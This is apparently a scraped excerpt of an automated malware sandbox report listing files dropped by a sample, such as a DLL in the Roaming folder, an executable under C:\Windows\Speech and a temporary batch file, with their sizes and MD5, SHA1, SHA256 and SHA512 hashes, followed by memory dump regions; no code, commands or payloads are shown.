9c8501b6c9e586b9791b7492697c2555a28fec65770e325890047d410fc84941

SHA512
8f45b29bde3794e02a263f07116260a588c478496c892ce4d12b7b8361ae6dac95a1ee0f0d7c7fb81ebdfb7c4d5123ccf18ef5ae9e150be04f65aa22a2d75e00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Medal.exe.log

Filesize
1KB

MD5
b0c702c8d460f5bad03b472976341813

SHA1
7a3e78f2f86bdbc1d7681f7221e95a4da555463e

SHA256
da7b1ba351bc75253de99ca934d5c77f7772789083b554a4708096deb4788a46

SHA512
314b9895fe0d1f02b2f26686f1ee8aac032041cf9df327d3e010b733184673c675b3b3822360f8b956707df84dfc10ad634b159272034b019c06d7952aeee4c9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
3eb3833f769dd890afc295b977eab4b4

SHA1
e857649b037939602c72ad003e5d3698695f436f

SHA256
c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485

SHA512
c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
13bb441db4b67134df6df77efdc5a95b

SHA1
2d2e7127a21e15da46f7f4564cfb1f126f1e9306

SHA256
38e64ab2debf8fdc04f7ee5e17bdc5644c409c8fb2312dfbe228563fdeef024b

SHA512
42bde3b8b0b11620cb79bf1ed1f7d8aed608af131e45ed65b7795ca00a3ee85b07fd047f164ec7e00066b4923d88308af09d31e7c9c9a83e32fb7b4ea3f4606f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
60ba7ac90c0e466144b48a90919960b6

SHA1
fe7f5d9e1d317f9409d8daa35d9c890f7e222d6a

SHA256
43d3c3113c66141b3a1f1f1bbf2d32a80128d029903ca58db09e9c6a9410ef9e

SHA512
92a1d912fd7be06820ec97b192b965d04ff44ff6a1c76b55405ecf20ca995762d823f52f174d8f48feb1d454716ab244adb4945febbf4fe4a6f91dd9791f87f2

Download Submit
C:\Users\Admin\AppData\Local\Temp\7Vz2dhDt3a.bat

Filesize
218B

MD5
aa74871efce06b2d6ac809eaacc7b987

SHA1
2c9883de6060032e3196a0d1c6195b85ddff2478

SHA256
4485e218668cb0a4ffcb690514080da73e665917abe1df3a0476d83fb09e17e1

SHA512
cfd076759e22a259d90c9c9003be05bbcd88897405f5e045986fac583c5d1d1ff364cc9affcfc4a5370bbc3ee1bf190e2742cb76e5f13084478011e92395ade3

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tgbpblll.qoe.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\gdi32.dll

Filesize
446KB

MD5
efd69d9f6037086f0b2e23417b7a1afa

SHA1
ac3c91b7bdcafad357ee578aa6fdbece22cd19ab

SHA256
27ef5c51d945dd64cd17718b01ce72fb352f9fc0a83f1adfd601d1e62b1469b0

SHA512
3bd6d0e1419286ce77c30a30f9e7df7114b5f6b81b75cd703e0293bb391ab7e573a807c267b461e7448a0e3744777b614bfa32b241cb4bc63fe44bf2173bf40f

Download Submit
C:\Windows\Speech\physmeme.exe

Filesize
694KB

MD5
1dc5d763d93e66ff1775cfc9d749d82d

SHA1
76f7efc39d4ae890c9d2da577af942f959f0d03f

SHA256
1de1f60c6f5ea26d2f2ebf5447910f156db59d896bbe753c90aa828cd6ef06f1

SHA512
4108d78571bd6df8a4e66ae70e2546a0b2011a3224f29acde1739e5b4ea80fde7450d00759fd479e8cbef75e7d26a840635509bd709a2863c6346dfab3f8e050

Download Submit
C:\Windows\Speech\physmeme.exe

Filesize
1.9MB

MD5
45d510cebcdf9aa852297a7303627ab1

SHA1
86605b896ec57d214d5839b2db897ae79be32778

SHA256
fc66c2a511a43c990ca2485814be308f2c65ef61d82124299036b3f8f694e5ee

SHA512
42ea67e8a6aaff3d1daec65f0b9c5e53952f55894fc0ce31259e61ad4ac277d3225d3b9ae142f78ae2d466387a0d92c5ba8059a0b2404d5a200aece40b9cea85

Download Submit
memory/3460-35-0x0000000000AD0000-0x0000000000C7A000-memory.dmp

Filesize
1.7MB

Download
memory/3460-37-0x0000000002D30000-0x0000000002D3E000-memory.dmp

Filesize
56KB

Download
memory/3460-39-0x0000000002D40000-0x0000000002D4C000-memory.dmp

Filesize
48KB

Download
memory/3480-4-0x0000000003090000-0x0000000003096000-memory.dmp

Filesize
24KB

Download
memory/3480-3-0x0000000000C60000-0x0000000000D16000-memory.dmp

Filesize
728KB

Download
memory/4676-12-0x00000000010F0000-0x000000000115A000-memory.dmp

Filesize
424KB

Download
memory/4676-16-0x00000000010F0000-0x000000000115A000-memory.dmp

Filesize
424KB

Download
memory/4676-11-0x00000000010F0000-0x000000000115A000-memory.dmp

Filesize
424KB

Download
memory/5048-78-0x000001D0E5BE0000-0x000001D0E5C02000-memory.dmp

Filesize
136KB

Download
memory/5084-60-0x00000000010F0000-0x0000000001159000-memory.dmp

Filesize
420KB

Download
memory/5084-55-0x00000000010F0000-0x0000000001159000-memory.dmp

Filesize
420KB

Download
memory/5084-56-0x00000000010F0000-0x0000000001159000-memory.dmp

Filesize
420KB

Download